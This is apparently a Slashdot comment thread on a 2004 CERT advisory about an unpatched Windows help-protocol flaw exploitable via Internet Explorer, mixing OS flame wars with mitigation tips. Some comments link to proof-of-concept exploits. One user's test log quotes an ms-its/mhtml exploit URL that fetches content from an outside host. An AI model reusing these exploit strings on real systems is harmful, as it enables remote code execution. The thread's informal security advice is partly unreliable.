Slashdot Mirror
New Windows Vulnerability in Help System
wesleyt writes "CERT announced today a significant Microsoft Windows vulnerability related to IE and its handling of the Windows help subsystem. There are currently no patches available and no virus definitions for the major scanners. As well, exploits have been reported in the wild. Because the vulnerability is in the help subsystem, even users who avoid Outlook and IE are vulnerable, since IE is the default handler for help files. It seems that this is going to be an ugly one."
...but Linux needs to get its act together.
/tmp or the installer will dump core. After the installer is done, edit /etc/X11/XF86Config and add a section called "GL" and put "driver nv" in it. Make sure you have the latest version of X and Linux kernel 2.6 or else X will segfault when you start. OK, run the Quake 3 installer and make sure you set the proper group and setuid permissions on quake3.bin. If you want sound, look here [link to another obscure web site], which is a short HOWTO on how to get sound in Quake 3. That's all there is to it!"
Linux is *not* user friendly, and until it is linux will stay with >1% marketshare.
Take installation. Linux zealots are now saying "oh installing is so easy, just do apt-get install package or emerge package": Yes, because typing in "apt-get" or "emerge" makes so much more sense to new users than double-clicking an icon that says "setup".
Linux zealots are far too forgiving when judging the difficultly of Linux configuration issues and far too harsh when judging the difficulty of Windows configuration issues. Example comments:
User: "How do I get Quake 3 to run in Linux?"
Zealot: "Oh that's easy! If you have Redhat, you have to download quake_3_rh_8_i686_010203_glibc.bin, then do chmod +x on the file. Then you have to su to root, make sure you type export LD_ASSUME_KERNEL=2.2.5 but ONLY if you have that latest libc6 installed. If you don't, don't set that environment variable or the installer will dump core. Before you run the installer, make sure you have the GL drivers for X installed. Get them at [some obscure web address], chmod +x the binary, then run it, but make sure you have at least 10MB free in
User: "How do I get Quake 3 to run in Windows?"
Zealot: "Oh God, I had to install Quake 3 in Windoze for some lamer friend of mine! God, what a fucking mess! I put in the CD and it took about 3 minutes to copy everything, and then I had to reboot the fucking computer! Jesus Christ! What a retarded operating system!"
So, I guess the point I'm trying to make is that what seems easy and natural to Linux geeks is definitely not what regular people consider easy and natural. Hence, the preference towards Windows.
Microsoft is in some serious need of some help on this...
I am sure the major virus scanners will have it before anything "really" bad happens.. this isnt anything special.. move along
"could allow an attacker to execute arbitrary code with the privileges of the user running IE" This is why you run as a restricted user rather than administrator or power user. Restricted users don't have write or modify permissions to the WINNT or Program Files directories or subdirectories. And they certainly don't have permission to screw with the registry.
Although there's no specific patch, the Windows XP SP2 release candidate mitigates this problem.
> and no virus definitions for the major scanners
Jesus, even my ScanJet is vulnerable?
Most of us here have already modified our systems knowing that having even the IE exe file or outlook express exe file could cause problems and have removed it (even in spite of the hidden little annoying backup). Remember to get rid of IE be sure to look in the folder /windows/system32/dllcache for those backup exe files that it uses to restore when you try and rip IE or outlook out yourself.
They announced this TODAY? It has been discussed on Bugtraq for weeks - and due to a few comments I made in their discussion forum the Swedish IDG.se reported this last Friday. I've also linked to one of the PoC-exploits here on Slashdot for people check for themselves. ... what took them so long?
Jelmer's PoC is good: link
(That page is the info page, you won't get hit by clicking on the link directly)
it's in my head
now would be a very good time to start the clocks to see how long it takes them to get a patch out. Should be a good case in point for the forrester research published last week. rd
I think MS wil fix this one soon because of its impact on the Windows concept as a whole. The help system is a crucial item.
Wel, CERT says to disable activex stuff, wel should be easy to fix i gues.
Hope they fix this one soon.
but besides company's and organizations i think most of the joe average windows users dont take the trouble of configuring their system with restricted users and such. (personally i find it hard to get it all configured right, for one how do i allow restricted users to define shares ??)
"By convincing a victim to view an HTML document such as a web page or HTML email message, an attacker could execute script in a different security domain than the one containing the attacker's document." => let's hope outlook blocks scripts or lots of people will be an easy prey thanks to the 'great' preview pane!
i don't think this will be msblast 2 but i do hope antivir's will catch up (wchich the undoubtably will)
long live mozilla!
I'm a man, therefore I use MAN pages when I need help. ;)
- A
IE's exe file is not very relevant, as it is only a loader for the DLLs that implement the actual functionality.
How else could it be so small?
To really get rid of IE you need to remove the DLL files that it uses, and you will break many other programs in the process. Because they all closely link to eachother.
If the Windows help thing can be disabled or uninstalled, maybe that exploit won't have anything to exploit.
I don't run Windows, so I don't know much about the help system in it, but what I do know is that the help it gave me was about as useful as fine bone china in a tea party for drunken Parkinson disease sufferers, so uninstalling/disabling it won't be a great loss.
"A door is what a dog is perpetually on the wrong side of" - Ogden Nash
mshtml.dll for one. Oh and hope that explorer is not broken in the process.
I don't know about the rest of you, but things like these are actually scaring me out of running Windows. Apart from my powerbooks (no problems there) I have one PC laptop on which I run WinXP and Linux and I like to use Windows for its ACPI support, but I'm now constantly afraid that some as yet undescribed security hole will allow someone to screw up my computer/home network. Brrrr. No Windows any longer, I'm sick and tired of being afraid when using my computer.
----- One learns to itch where one can scratch.
Can anyone explain me, how can Mozilla invoke IE without me expicitly permitting it, and if there are any settings for Mozilla to prevent it ?
Remember to backup your registry (or at least this portion of it)
a nd ler\{ms-its,ms-itss,its,mk}
From the CERT article:
Currently, there is no complete solution for this vulnerability. Until a patch is available, consider the workarounds listed below.
Disable ITS protocol handlers
Disabling ITS protocol handlers appears to prevent exploitation of this vulnerability. Delete or rename the following registry keys:
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\H
Disabling these protocol handlers will significantly reduce the functionality of the Windows Help system and may have other unintended consequences. Plan to undo these changes after patches have been tested and installed.
Follow good Internet security practices
These recommended security practices will help to reduce exposure to attacks and mitigate the impact of cross-domain vulnerabilities.
Disable Active scripting and ActiveX controls
NOTE: Disabling Active scripting and ActiveX controls will not prevent the exploitation of this vulnerability.
Disabling Active scripting and ActiveX controls in the Internet and Local Machine Zones may stop certain types of attacks and will prevent exploitation of different cross-domain vulnerabilities. Disable Active scripting and ActiveX controls in any zones used to read HTML email.
Disabling Active scripting and ActiveX controls in the Local Machine Zone will prevent malicious code that requires Active scripting and ActiveX controls from running. Changing these settings may reduce the functionality of scripts, applets, Windows components, or other applications. See Microsoft Knowledge Base Article 833633 for detailed information about security settings for the Local Machine Zone. Note that Service Pack 2 for Windows XP includes these changes.
Do not follow unsolicited links
Do not click on unsolicited URLs received in email, instant messages, web forums, or Internet relay chat (IRC) channels.
Maintain updated anti-virus software
Anti-virus software with updated virus definitions may identify and prevent some exploit attempts. Variations of exploits or attack vectors may not be detected. Do not rely solely on anti-virus software to defend against this vulnerability. More information about viruses and anti-virus vendors is available on the US-CERT Computer Virus Resources page.
Does this require exterminating IE completely off the machine to fix ?
We had the release of a "conceptual" Trojan yesterday.... but not a real virus.
Some software company was trying to sell their mac virus software. A real ID3 tag Mac Trojan does not exist right now.... and odds are we will see patches before one comes to be.
"Things are more moderner than before- bigger, and yet smaller- it's computers-- San Dimas High School football RULES!"
Follow the link, read the report, then come back and tell us why this might be important.
The RUNAS service will allow you to run an executable with elevated privileges. And shortcuts have the option to run as a different user by clicking the check box that says,"Run as different user." To use the RUNAS service, just hold down shift and right-click and you'll see an option that says "Run As".
There is a proof of concpet page here. Neither mozilla nor firefox are susceptible.
I couldn't care less whether you are modded up as insightful or modded down as troll (and I know which I'd do). /. quite frequently reports on vulnerabilities in free & open source software - and of course these articles receive a bunch of trollish replies along the lines of "who cares" and "why's this news".
trojan viruses have been in the wild for atleast a week, probably more, you get infected by visiting a website (with IE ofcourse) and then it spams URLs of the trojan via mIRC.. the process is something like wsz32.exe or nosc32.exe (in %windir%\system32\)
... that not publishing vulnerabilities doesn't stop exploits. This one had exploits long before the vulnerability was known to anyone but the hackers. I have to laugh every time MS whines about how problems would go away if vulnerabilities were never disclosed, except to the vendor of course. The only thing that might go away is the bad PR, if even that.
Wel, how secure is GNU/linux then???
...
Most programmers are sloppy, hence they leave buffer exploitable code in their releases and other stuf to.
From a security standpoint, GNU/Linux is less safe as Micro-soft stuff, but Micro-soft blows its onw advantage by releasing their software to early, wich of course contain bugs.
This is not flamebate, i'm just a Computer engineer who happens to be concerned about security, and right now there is no secure product at all.
At the risk of replying to a Microsoft troll, this is not a "pretty insignificant" story.
Errors in server-side applications are rapidly fixed by serious system administrators and at the worst they provide attackers a way into unprotected systems. How many computers around the world are currently infected or zombied thanks to holes in any of the programs you cited? Almost zero.
Security holes in client-side applications (MSIE, Outlook, primarily) are a totally different story. These programs are mainly used by people who don't have the capacity to protect their systems. And the results are clear: millions of PCs infected by everything from viruses to worms and spywares, used as platforms to launch DDoS attacks, to send spam, to steal information...
There is a real security problem on the Internet, one that is making a joke of the "information highway", and it's almost entirely caused by vulnerabilities like the one reported here.
Until the market leader realizes that its users need serious protection from the malicious forces who roam the Internet, no amount of criticism is too much. And, if you really want to support and defend Microsoft, you should be adding your voice, because it is this issue - its failure to provide its users with a safe platform - which will be its downfall.
"Microsoft = insecure" is an association that should be sending shivers down the backs of those marketing managers trying to bomb the web with billions of Microsoft adverts.
Ceci n'est pas une signature
I don't know anything that can be really disabled or uninstalled on Windows. Since it's already mentioned that IE is the default handler for help files, I guess people are out of luck in this regard.
I once wanted to uninstall the games that come preinstalled with Windows. So, I got the relevant registry tweaks from support.microsoft.com to have the games displayed in the "Windows Add/Remove Programs" section. Great! Guess what happened? The shortcuts were removed, and the exe files left in place. That's apparently what Microsoft considers uninstalling to be.
zWhat would an EWOULDBLOCK block, if an EWOULDBLOCK could block would? -- me
Are you sure?
i loaded up ie, went help... contents and index... search... and typed in"help subsystem vulnerable" and hit list topics
a pop up box announced "no topics found"
so what is everyone talking about? this doesn't seem to be a problem
intellectual property law is philosophically incoherent. it is your moral duty to ignore it or sabotage it
this is probably some kind of mean trick from mister Linus to discourage the use of Windows. I don't believe in this vulnera...
hey, where did my files go?
Save it as chm-disable.reg
Put a line like this in your logon script:
regedit
Use the same trick to restore the values when a patch is available (that means that you must save the HANDLER keys first).
Note: If you're still using batch files: KiXtart is your friend!
What about pico?
Quid festinatio swallonis est aetherfuga inonusti?
Africus aut Europaeus?
It seems that this is going to be an ugly one. I always already thought this IE thingy was an ugly one, even without this bug?
"I did this cuz Linux gives me a woody"
how to format my harddisk. Maybe Windows-help can provide me with some support. *clickety-click*
sig(h)
we haven't finished talking about the OS X security hole. Damn MS always has to get market dominance in everything they do...
The Mothership
you will be afraid too
and being afraid is a GOOD thing
it makes you vigilant
there is no system out there that is 100% virus proof
so don't make excuses to lull yourself into a false sense of security
always be vigilant, and you will minimize your risk of being infected
it will never be 0, no matter what os you use, no matter what you do
intellectual property law is philosophically incoherent. it is your moral duty to ignore it or sabotage it
yeah you wish, if i knew what was wrong i couldnt fix it myself, thanks Bill !
NOTE: Using an alternate web browser may not mitigate this vulnerability. It may be possible for a web browser other than IE on a Windows system to invoke IE to handle ITS protocol URLs.
;)
yeah its a bigger problem than just IE another web browser or email client may end up doing you in. best get off that windows box.
anthony
I use a "custom level" for my internet zone. I basically turn off *everything*. I don't need java, and "active scripting" should be re-worded to say "give web pages access to God-knows-what?".
Besides, I really despise the "AppletTransition Sensor" that ESPN and other sites use. Screw `em. Just give me the dang HTML and, please, IE, just render it for me. No code, no scripts, no popups, no crap.
Websites that require JavaScript piss me off. The stupid Washington Post can't even render a page without JavaScript. What a terd.
Now, if only I could get IE to stop displaying the "Your browser doesn't allow ActiveX controls" message that pops up on pages where the designer used some crap control. I've made ActiveX controls and I *know* they can do anything they want on my system. Arg.
And wtf is with "install desktop items"? This is a *web* *browser*, not the control panel, for crying out loud.
And, last but not least, when I disable all this crap and then hit apply, it gives me a confirm warning message, but when I (because I need to use JavaScript on some crappy page) restore the default "cheap-whore-mode" settings, it doesn't say a word! Nice emphasis, Microsoft.
Yeah, I know, use a different browser (or OS), but we all know Windows is *designed* to not interoperate well with those things, right? Sometimes, it wastes time to try to fight inertia.
Anyhow, my feeling is that the desktop situation on Linux and BSD won't be solved until X is ditched completely. Just give me the dang screen buffer(s) and some basic routines and I'll draw my own shtuff. X is a 25-year-old terd, designed for machines with, like, 4k of memory (warning: hyperbole). Just give me font, line, point, ellipse, bitblt and friggin window data structures -- straight to the video card. And access to the video card reg's would be nice too.
End of Rant, enjoy your day.
Peace & Blessings,
bmac
Where's my friggin points when I need them?
Look, this is absolutely true. There is still plenty of software out there that breaks under W2K/WXP when not run as a local administrator.
And forget 'looser' environments. I run a network at a private school. Care to take a guess how much educational software cares about following the rules properly? Grrr!!!
"...Well, there's egg and bacon; egg sausage and bacon; egg and spam; egg bacon and spam; egg bacon sausage and spam..."
...but Mr MS-Security himself said that there were NO exploits prior to the security patches !
Maybe we deserve this world ?
GNU/Linux is inherently more secure than Windows. Not least because GNU/Linux is a derivative of UNIX, which was designed from the bottom up to be a multi-user system. Permission-based security is a cornerstone feature of GNU/Linux, whereas Windows (being derived from DOS) can't implement a proper multi-user model for the sake of backward compatability.
I'd argue this one. Vulnerabilities are only result of more than a decade of totally iresponsible behaviour of Microsoft. More $$$, no matter what. That's the real cause.
"Microsoft = insecure" is an association that should be sending shivers down the backs of those marketing managers trying to bomb the web with billions of Microsoft adverts.
I think they will shiver not of fear, but of lust.
Don't fight for your country, if your country does not fight for you.
does anyone know where this exploit originated?
is it, perchance, related to the recent windows source code leak?
K.
What browsers do not invoke IE to handle ITS protocol URLs? If I use Mozilla for example, could I still be vulnerable to this security hole?
That's it! I'm buying a Mac!
"The more I use Windows, the more I love my Commodore 64"
If telephones are outlawed, then only outlaws will have telephones.
games require you have admin access to work, i.e. The Sims (god knows why)
That is for the copy protection to work properly.
God.
for MSFT to survive in the future will be open sourcing critical sections of the OS. I mean windows XP is a huge piece of software, the real cost is in maintaining it not necessarily production. Now imagine longhorn and how much it tries to accomplish. I dont see MSFT being able to afford it single handedly in the future. Especially if MSFT wants to position itself as a company that is selling a software that is not only ubiquitous but secure as well.
Activists United
That's not the point. MS has tried to lead the public to believe that there's never been an instince of exploit code before their patch. And obviously if there's exploit code out there, something already "really bad" has happened. This comes after the witty worm spread before ISS had patches for their products.
On a related note, MS pretty much NEVER releases advisory's on their own will before a patch. There almost always has to be a 3rd party that has said they are going to go public, or there have to be exploits or information in the wild. With that information, I wonder if this exploit is related to the windows source leak. The source leak had a lot of IE code, and if there are exploits in the wild before MS could even send out an advisory. That would lead me to the possiblity that the windows source leak could be the source of this one.
Thanks, I always did rather wonder about that, of course getting rid of the exe file itself means that almost all of the programs that annoyingly try to call it up without my consent come up empty handed. So for me it was still worth it to tear out the exe files.
Why did you make it so bloody difficult to switch off html content in recieved Email text? AT best, it meant bandwidth guzzling spam, at worst viruses you didnt even have to open to catch..
As to browser/plug-in vulnerabilities, it may never be possible to eliminate them all, there are just too many niches for a virus to gain foothold.
"You lied to me! There is a Swansea!"
There you are, all your user friendliness rubish, that Linux is ready for the desktop.
How would Joe Average, Jose Sixpack, Aunt Tillie, your Mom, my Mom, Granma, Grandpa, the children, would react if faced with such arcane, incomprehensible instructions.
In Windows everything is easy, In Windows everything is one click away.
You Linux zealots are the sux0r.
IANAL but write like a drunk one.
Are you happy now, or do we still need to educate you why modularity is a better design compromise?
Thanks to MS decision to embed IE into everything in WIndows makes Windows a breeding ground fro vulnerabilities.
IANAL but write like a drunk one.
I ran a few quick tests on a couple of different Windows XP systems using the proof of concept exploit code here.
s peed.planet.nl/security/newone/modified//EXPLOIT.C HM::/exploit.htm
.chm) in any directories except for the ProgramFilesDir and System directories, but, as you can see, it did not stop the sample code from executing when IE was run with administrator privileges.
---------
Windows XP Professional Service Pack 1
Mozilla Firebird 0.8 run as limited user: no apparent effect
Mozilla Firebird 0.8 run as administrator: no apparent effect
Internet Explorer 6 run as limited user causes an Internet Explorer Script Error:
Line 47, Char: 5, Error: Write to file failed, Code: 0
URL: ms-its:mhtml:file://C:\foo.mht!http://ip3e83566f.
Internet Explorer 6 run as administrator: demo exploit runs as expected
A software restriction policy is in place on this machine, forbidding the execution of any executable files (including
------------
Windows XP Professional Service Pack 2 RC 1
Internet Explorer 6 run as administrator: no apparent effect
Fixed in SP2?
---------------
One thing that concerns me about using this particular sample code as a test, is that it seems to rely on having write permission to \Program Files, thus requiring administrator privileges (usually) and thus making limited user accounts appear to be invuelnerable -- but are they? Can a version of this exploit be written that runs even if the user does not have write privileges to the program files and system directories? (Thus giving access to all of the limited user's files.) In such a case, would software restriction policies prevent the execution of the exploit exe even if not stopping the script itself?
Windows XP sets up its users with full administrator privileges by default and without a password.
The simple Control Panel even hides the management interface to make granular security possible.
The truth is, in order for NT to work in consumer homes, it had to behave just like DOS versions of Windows did.
Joe Sixpack may be computer illiterate, but his dollar is what ultimately fills Microsoft's coffers.
Up, Up, Down, Down, Left, Right, Left, Right, B, A, START
Comment removed based on user account deletion
never lull yourself into a false sense of security
that's when you'll get infected
because you'll find your blast doors have been infested with termites and your security system has been switched off somehow
be always vigilant
intellectual property law is philosophically incoherent. it is your moral duty to ignore it or sabotage it
okay how is bill going to indemnify me on this one.
sure I can point the finger to microsoft but doesn't help very much when my computer is hosed.
I am so sick of hearing about indemnification used with the sco case. Why don't they talk about it now. Because it is an non issue - software companies aren't liable for anything. So why buy their crap software. I am sticking with open source at least they own up to their mistakes and fix them a hell of lot more quicker than Microsoft.
I don't know about that specific vulnerability, but I always suspected something fishy about the chm files. They can run javascript and whatever else you compile into them with full user priviledge. Yes, I write chm files. I think a workaround is to disable Javascript and other scripting at the local intranet security level in IE options.
Non-Linux Penguins ?
Isn't that an oxymoron? I was reading an interview the other day that Gates has shifted the company's #1 priority from Longhorn to security. This is another major blow for Microsoft. But, since when has the help menu actually ever been useful anyway?
Considering how seldom the idiot^H^H^H^H^H^H users actually use the help function whre I work, it shouldn't be a problem. It seems they regard the IT Support "Help Desk" as their first place to look when they ought to be using the online Help function in that seemingly invisible menu at the right side of their window.
You see? You see? Your stupid minds! Stupid! Stupid!
Pardon me sir, i think it's spelled "loser"...
:)
And if they lost anything since then they'll learn not to click on that email that they were told not to.
And when they bitch, you can show them your Linux desktop and click on that "bad" email a bunch of times and say "It's all because Windows is soooo insecure..."
Count one more non-techie user who's just been moved a bit out of the Microsoft orbit!
My apache logs are STILL full of codered / nimda hits from IIS machines. The client/server divide is actually bullshit. Windows owes it's dominance to making it easy for the technically inept to do the things they still do not understand how to do when they have clickety-clickety-done them. Fortunately MS can afford to pay me bandwidth costs for the deafening cresendo of background noise that virus/worm traffic is ramping towards. Bring on palladium and stop these windows using cretins from ruining it for the rest of us.
So basically, then, that makes it so that if the user gets infected by something, all it can do is destroy that user's personal files...
I wonder...does anyone here keep their data in a separate account? I wonder how much safer/inconvenient that would be.
the new version of xpy has the (temporary?) feature to disable the chm file handling (for those who like it userfriendly or what it's called)
Ok. we can disable HTML in mozilla, but how we could protect someone from viewing html in a (free) webmail?
It seems that this is going to be an ugly one.
How about the report this morning on Linux being completely unacceptable for ANY secure purpose including defense, from the AP?
"Linux a national security risk" is the headline, I believe. Is that an ugly one, too?
"...I'm now constantly afraid that some as yet undescribed security hole will allow someone to screw up my computer/home network."
Aww, he's afraid. Stay off the Internet then. Problem solved. There will *always* be a risk of this as long as you connect to other networks, regardless of the operating systems in use.
Now if you do want to be on the Internet, do the following things, and maybe you won't be "constantly afraid" anymore. While not foolproof, these instructions will *greatly* reduce risks of the big bad boogeymen messing up your little home computer.
Step 1: Correctly Install Good Hardware Firewall
Step 2: Correctly Install Virus Scanner/Updates
Step 3: Correctly Install Spam Filtering Mechanism
Step 4: Don't be stupid and open stuff with attachments or download stupid crap
Step 5: Actually make Backups and test restoring them once in a while to make sure the backup works.
Step 6: Configure computers to automtically update with OS patches and Virus scanner updates. Keep firmware on firewall updated.
Step 7: Schedule appointment with psychologist to discuss your overwhelming panic and fear.
But try explaining that to my dad, who cant figure out what program hes sending e-mail from.
All Troll + "offtopic" mods are meta moderated as "Unfair", because you abused the system.
Do the users where you work not have Internet or e-mail access? Then I guess you are safe.
The IT Support Help Desk? You`re guaranteed to get a virus there!
Everyone keeps talking about a virus and trojan that will get into your PC with this exploit.
I would think adware spyware makers will be using this in their webpages to get some progs installed on your computer. They will have a lot of fun with this hole.
--Seth
I haven't added many yet, but it's a start.
Now, I just have to try to get manglement approval to add known spyware sites to the list as well...
Imagine teaching your mother to use one account for installs, and another for her email and browsing, then throw in some stuff that will only work under admin and you'll quickly see where this goes.
Somewhere in Linux-land, a phone rings....
Hello? Oh, hi mom. Yeah, I can help you install a program on your computer. What do you want to install? Oh, cool. Have you downloaded it? Good job. OK, open up a terminal.... it's a command line interface, where you type commands. Much more powerful than a GUI. Where did you save the file? You don't remember? Hmm. Just type "cd". Now type "ls". Do you see the file name? Great! OK, type "tar -zxf "
It didn't work? What does it say? OK. What is the name of the file you downloaded? Oh, well, that is a bzip file, not a tar and gzipped file. So type the same thing as before, but use "bzip2" instead of "tar".
What? Why didn't it work? Oh, it doesn't have the same syntax. Crap. Go to the man page. Oh, man stands for manual. Type "man bzip2". What does it say?
(20 minutes later)
OK, now we have uncompressed the files you need. No, not yet. Type "./configure" No, it's OK, it is figuring out what kind of computer and software you have.
OK, now type "make" OK, call me back when it is done.
(15 minutes later)
OK, now type "make install" What? Why not? What does it say? No, not that. Oh, wait, you have to be root. It is an administrator user.
Because not just everyone can install programs, for security reasons. Look, just change to the admin user by typing "su". OK, now enter the root password. I DON'T KNOW! You mean you don't know your root password?
(10 minutes later)
Mom, you should NOT use the dog's name as the password. Because it is insecure! Nevermind. Just type "make install". There. Now it is installed.
No, there is no icon, you have to type the name of program to run it. Type it. What? I don't know, what was the name of the binary after you compiled it? A binary file is a program you run. You compiled it when you typed "make". Hmm, let's look in the Makefile. Type "vi Makefile". What do you mean it is blank? Oh, wait. Use capital M. Type ":r Makefile" with a capital M.
OK, now you are in vi, the most powerful editor ever. WHAT DO YOU MEAN YOU PREFER EMACS!!!!
My beliefs do not require that you agree with them.
a v'irus has been fo)und on Your"r sys:tem. Press F1 for mor'e in!format%ion.
The code was for IE5, this is very unlikely. And a patch is available, its called shutting off the help sub-system. With Windows 2000 and XP it is a service, one which I never use, although I'm sure some people do.
Is that all you have to do? I just stopped and disabled the "Help and Support" service in WinXP Home. But then when I try "Help and Support" from the Start menu, that service switches itself to Automatic and starts again! Of course I won't be opening H&S any time soon.. but if "disabled" doesn't mean much, will it stop a virus? Or just start itself back up again?
You want a sig? I can get you a sig... Hell, I can get you a sig by 3 o'clock this afternoon... with nail polish.
I love the smell of a Windows Vunerability in the morning....smells like victory...
For Linux I mean.
IE hijackers are already employing these exploit methods to install ActiveX and browser helper objects onto IE, throwing popups everywhere.
If they open worm-propagating password-protected .zip attachments from unknown sources they'll open anything.
i think it's simply a matter of complexity
;-)
computers and software are getting more and more complex with each passing minute
play the statistics: it becomes inevitable, after a certain size level, that a given piece of software has at least one bug in it, somewhere, that can be exploited for wormlike/ viruslike behavior
you have faith in human engineering abilities, that is noble, but perhaps naive: humans have an infinite ability to screw something up without even realizing it, none of us are omniscient
and so: beware that false sense of security my friend, that will be your achilles heel more than windoze ever could be
and besides, you are forgetting the most error-prone piece of the equation which will always be the prime piece of failure when preventing any intrusion in any os, and can never be reengineered or routed around:
the end user
intellectual property law is philosophically incoherent. it is your moral duty to ignore it or sabotage it
My girlfriend's a real cracker!
(She'd better not be a hacker. Now, where did I put that axe?)
geez, someone is drowning in hyperbole today... is there absolutely no validity or wisdom in the simple, straightforward concept: be always vigilant when it comes to computer security? ;-P
intellectual property law is philosophically incoherent. it is your moral duty to ignore it or sabotage it
Have you RTFA? The vulerability can be exploited by convincing the victim to view an HTML document or an email, no need to use the help system or anything.
RTFA here, and check out the exploit demo here, and then figure out that you didn't use the help system, and yet the exploit happened.
The IT section color scheme sucks.
Heh, I always fept vulnerable when using Windows help
I've always considered this to be CERT, not this.
Apparently our new Dept. of Homeland Security launched us-cert.gov as a partnership with Carnegie Mellon's cert.org (and others, in the future).
I feel safer already.
---------------------------------------------
SERENITY NOW!!!!!!!!!!!!!!!!
Yeah, it must be a dll loader, cause it can't be that small and have that many bugs. They give us a false sence of security!
Education. There are technical solutions to most of these problems, but none are as good as teaching people to look after their computers better.
The other day my boss called me over to check out a suspicious looking email that had made it's way past SpamAssassin. It rendered blank, but looking at the raw message code revealed it was using just this kind of exploit (with a <FORM> to obfuscate what was really happening).
My boss' account has Restricted User privileges, with Eudora as the MUA and Mozilla as the browser, so no panic, but the fact that spammers are already using this is scary.
I use Firefox on WinXP, but if I use it to visit Windows Update, I get:
Without IE, I am permitted to manually browse through all (!) MS downloads to try to spot anything I might need, but I can't get it to tell me which patches I need, based on the current state of my OS.
So it's a choice between two evils: I either keep IE (and its assorted security holes) or I give up the ability to scan for OS patches.
(WinXP has an automated system for updates, but I'm not sure whether it does "Recommended" patches or just "Critical" ones, it doesn't do drivers, and I don't like having to take it on blind faith that it's working -- I want to scan to make sure.)
I should buy some cement.
Explorer is already running (as your shell) and you can't convince it to restart itself as a different user. What you have to do is kill your existing explorer, (which kills everything including your desktop) then use the task manager to start it again using runas.
The new problem there is your WHOLE DESKTOP is now running as Administrator. Remember to kill it and restart it as yourself when you're done.
THIS THING CAN TURN ON A DIME, MACROSSZERO STYLE ALSO FUCK BETA, ~NYORON
A serious question here... I run Windows 2k as Administrator with a broadband connection. Both my box and connection are always on, and have been that way for 3+ years. I do not run a firewall, nor do I run any virus scanners. Every few days I run Adaware to check for spyware. I keep my system patched with the latest updates. If my machine begins to act strangely, I go to Trend Micro's free online virus scan, and scan the system. I am savvy enough in my browsing, email, and downloading habits to avoid anything suspicious. In the last three years have had no problems that these actions could not resolve. I've lost no files, and if my box is a zombie, I haven't noticed. I realize that there is the potential for catastrophe, but to my mind, the risk isn't significant. All I want to do is play my games, email/web, plus a little code for work when necessary. If I lose my files, bummer, but oh well. That's life, and why you burn backups (which I don't do either). I reformat and rebuild once a year anyway. So my question is: why should I get my panties in a bunch over security? (Posting anonymously for obvious reasons)
Will someone find out MS managed to make ascii text files a vulnerability?
YARR!
I never thought I'd be in with this crowd, but I'm looking to "make the switch" soon...
-Jesse
Nothing says "unprofessional job" like wrinkles in your duct tape.
That's an important piece of info. With the recent version of Firefox automatically opening MS Office files (thereby opening a virus vector), it wouldn't surprise me if the Mozilla developers turn this feature on.
1.) disable javascript
2.) disable activeX
3.) disable help
4.) keep a software firewall up
5.) keep a router/firewall up
6.) Try to do a windows update.
5.) Profit!?
I have some questions
If you advise people to delete the registry key, what are the ramifications for them during normal browsing?
The article says it may effect other browsers, but I am wondering if that is entirely true, are there any other windows browsers that people can run that won't suffer from the exploit?
The reason is, if you tell windows friends about this, point them to the advisory, you will get eyeballs rolling back. There needs to be a normal non guru level english description and howto deal with this.
I am reluctant to tell someone to *delete* a functioning registry key in particular, but seeing as how this involves merely clicking on an html page, the main deal with normal surfing.. well, what do you tell people? All the different "switch from this user level to that, unless you need this app, no wait, only for that one and..." and delete this and whatnot are just going to mostly result in *no action* being taken by most people if they even hear of this.
If someone can point to a better written (for normal users) synopsis and mitigation path than what is on certs site (technically accurate but rather convulted and arcane),I'd appreciaste it
Just the other week I read an article in which Microsoft was slamming Linux when it came to patches. How much faster they were, how slow Linux was in patching the OS and so on.
:-)
Then I come to slashdot and read this. Puts a spring in my step
Has Comcast disconnected your Internet account? Same here. You can read about it at http://comcastissue.blogspot.com
Phone rings.
Hi mom. You want to install a program? Ok, what's it called?
Great! Now open a terminal window. It's a command line interface and it's much more powerful than a gui. Got it open? Great. Now you have to become the superuser, so type 'su' and then put in the password.
You don't know your root password? Ask dad.
Ok, great, so now you're root. Now type "urpmi", a space, and the name of the program you wish to install.
It's asking for the CD that contains the program. Put that CD in and follow the directions.
You're done, now? Great! Now just click on your K menu and you should find it under "Applications". You don't have a K menu? You have a little paw. Ok, click the little paw, yes I know it's cute. Found it? Glad to help!
Like what I said? You might like my music
That no matter what you tell people, no matter the way you present the facts. They will be reluctant to fix anything. I have told non-technical freinds about different exploits for years. Even gone as far as demonstrate how I could use IE to do what I wanted from an email. Yet they insist that their firewall, their virus scan software, keep their pc safe and secure. The only secure pc I've ever seen. Is the one not connected to the net.
.js. Stop viewing email in OE in html. Troll the security sites. Your attacker does.
So disable those ActiveX controls. Prompt to run
I am Bennett Haselton! I am Bennett Haselton!
Mozilla is not vulnerable.
There are two kinds of protocol handlers in Windows: system-wide and IE-specific. Mozilla supports the system-wide protocols but not the IE-specific protocols. ms-its is an IE-specific protocol.
We should probably take a second look at the system-wide protocols, though. Currently we blacklist some and let the rest through.
Pride Goeth Before a Fall
Linux is *not* user friendly, and until it is linux will stay with >1% marketshare.
Take installation. Linux zealots are now saying "oh installing is so easy, just do apt-get install package or emerge package": Yes, because typing in "apt-get" or "emerge" makes so much more sense to new users than double-clicking an icon that says "setup".
I hate to break it to you, but anyone with the attitude you display is the problem, not a lack of user friendliness.
I have used linux since
I just did a fedora core 1 install. What a joke! Less questions, less knowledge required than a Windows install.
Even once you get it up and running it is smooth and easy to find what you want, vs. a standard kde install on another distro leaving you 40 choices for each type of functionality you'd like to use.
Here's the problem - any installation is somewhat of a barrier because most people do not install windows themselves - it comes on their computers. The steps being taken by Sun, Lindo(w)s, SuSe, Xandros, and others to get their distros defaulted on budget machines will get the familiarity and ease-of-use out there to the masses.
Linux zealots are far too forgiving when judging the difficultly of Linux configuration issues and far too harsh when judging the difficulty of Windows configuration issues. Example comments:
You're right. A friend is helping me bootstrap debian on a running machine I have nothing but net access to. Obviously a little tricky, but once you understand the basics, it's really reasonably easy. However, most Linux "power-users" would expect everyone to be able to do it.
Your examples with Quake show just why we need a common push for progress in this area, and the individual camps are making great strides, but there's needs to be a more unified effort to get better traction.
"In IE, it copied itself over..." (means to me: IE is vulnerable, and your test is valid)
"Firefox, OTOH, didn't budge...same thing with Netscape and Opera..."
Does "Same thing" mean your test with Netscape and Opera showed they were safe like Firefox, or they were vulnerable like IE?
I think you mean your test suggests they're safe, but I want to be sure....
Pavlov wouldn't be so famous if he'd used a can opener instead of a bell.
